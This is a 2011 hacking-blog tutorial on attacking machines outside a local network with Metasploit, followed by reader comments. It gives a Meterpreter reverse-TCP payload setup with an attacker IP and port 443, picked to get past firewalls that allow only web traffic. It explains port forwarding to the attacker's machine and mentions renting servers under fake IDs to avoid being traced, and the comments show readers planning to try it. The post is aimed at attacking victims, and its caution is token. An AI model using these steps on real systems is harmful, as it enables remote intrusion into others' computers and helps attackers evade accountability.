Dear Readers: HWS has recently started a new project for the students of engineering ====> The Engineering Projects


Write at HWS !!!

Guest Posting

Monday, October 3, 2011

How to do Hacking the WAN Internet Using Metasploit


A few days ago there's someone put a message on my contact in this website, he asking about "is it possible to do hacking outside LAN(Local Area Network)?". When you see all of my articles, 80% of all hacking articles were written for Local Area Network, because I'm doing in my own lab, "so how about hacking outside Local Area Network?". Of course it has the same logic like when you attacking from Local Area Network .

Requirement

Step-By-Step

  • Okay let's start from Virtual Private Server(VPS). This server can give you freedom to install any software you want on virtualization, because this hosting type give you flexibility to manage your server yourself (DIY)

  • Dedicated Server almost doing the same like VPS(Virtual Private Server), but usually you have your own machine and then you put your machine on data center(or the service provider rent you their machine). This hosting type also allow you as user to manage your system yourself. You can do anything to your server and install anything you want to your server.

  • Cloud server –> I haven't trying this…maybe someone can share

  • You have internet with public IP address… usually when you subscribe 1:1 internet bandwidth, they also give you 1 public IP.

  • Control router by ourselves to redirect incoming connection or outgoing connection.
    Before we continue to next step, let's see the figure below(I will try to figure it out in simple way) .

  • Legends(Attacker) :
    - Attacker1 use local IP address –> 192.168.8.8
    - Attacker1 have public IP address –> 73.67.123.85
    - Attacker1 can control his router to redirect any incoming/outgoing traffic.
    - Attacker2 use VPS/Dedicated/Cloud server to do an attack that connected directly to internet.

  • Legends(Victim) :
    - Victim1 have local IP address –> 192.168.1.2
    - Victim2 connected to internet via router+firewall, this firewall only allowing port 80 and 443 for outgoing connection
    - Victim2 connected directly to internet with IP address –> 98.87.112.89

How to Attack?

  • Actually the network topology I draw above it's almost the same method to attack, you should know what is typical rules when administrator setting up a firewall(in this case is the network administrator who administer router for victim1).

  • AFAIK they usually open specific port like :

  • TCP 80(Hyper Text Transfer Protocol – HTTP) –> For browsing and surfing the website

  • TCP 443(Secure Socket Layer – SSL) –> Secure HTTP connection or usually called HTTPS
    etc(you can scan it first but be careful).

  • From the information above, usually attacker can create some payload and options like this :set payload windows/meterpreter/reverse_tcp
    set lhost 73.67.123.85
    set lport 443

  • When the attack successfully launch, the payload will try to connect to IP address 73.67.123.85 with port 443. Attacker use port 443 because he know that victim1 firewall only allow port 80 and 443 for outgoing connection. If you configure the payload by using another port, the victim1 firewall will drop all unintended packet who will go through another port except 80 and 443. For the next step, attacker should configure his router to redirect all incoming traffic to port 443 to his local IP address 192.168.8.8.

  • You can see the tutorial about example port forwarding WRT54G router here. Actually all router will have the same option for port forwarding

  • Oops…I almost forget to explain how to do that from VPS/Dedicated/Cloud….
    Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

  • You should remember that every action triggering some consequences even it's good or bad. When you doing something you should know every consequences you will get later when doing the action. Be wise .
Hope it's useful for you.
If information I wrote here was wrong, let me know I'll correct it

About the Author

I am XEO Hacker, the founder of Hack With Style (HWS). I am blogging since 2009 before that I just search things and now I am sharing my knowledge through this plateform.I'm also a freelance writer on topics related to Website Hacking,Website Optimization (SEO), blogger customizations and making money online.
In 61 people's circles

Subscribe To Get FREE Tutorials!


Respected Readers:
As a 21 year old student, the only income I rely on is my pocket money. Bearing the running costs of HWS Blog has become really difficult. We educate thousands of bloggers a week with our tutorials. To help us go forward with the same spirit, a small contribution from your side will highly be appreciated.

12 comments:

ITs a real pro hacking , i think we should do care while doing it :/
and its passing just above my head

well said man
finally a new trick
i must try it n will tell u howz i find it

I am not getting how to play with VPS dedicated cl;oud pls explain it a little further

@hashim its a lil pro .... not so difficult just read carefully having any problm may ask here

@loris thnx bro

@brian thanks to u too

@anonymous ..... read 2nd last step

Actually from VPS/Dedicated/Cloud it will be more easier and also safer(maybe..LoL), because there's a lot of hacker use this service…they buy using fake ID(hit and run) and then perform an attack from its server. The logic is almost the same with I've already explained above.

Ummm ... some modification needed ... it will work though ... if you guys have backtrack 5 .u can use SET to create payload and listener easily ... i'll post on it soon

can u tell me how do i config WAN setting in my back track plz help me

Bluehost is ultimately the best web-hosting provider with plans for any hosting needs.

Confused? Feel free to ask

Your feedback is always appreciated. I will try to reply to your queries as soon as time allows.
Note:-
Please do not spam Spam comments will be deleted immediately upon my review.

Regards,
XEO Hacker

Post a Comment

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Join Me On Facebook

700+ Followers

Followers


meet women in Ukraine contatore visite website counter
DMCA.com

Recent Comments

Follow Me On Twitter

1112+ Followers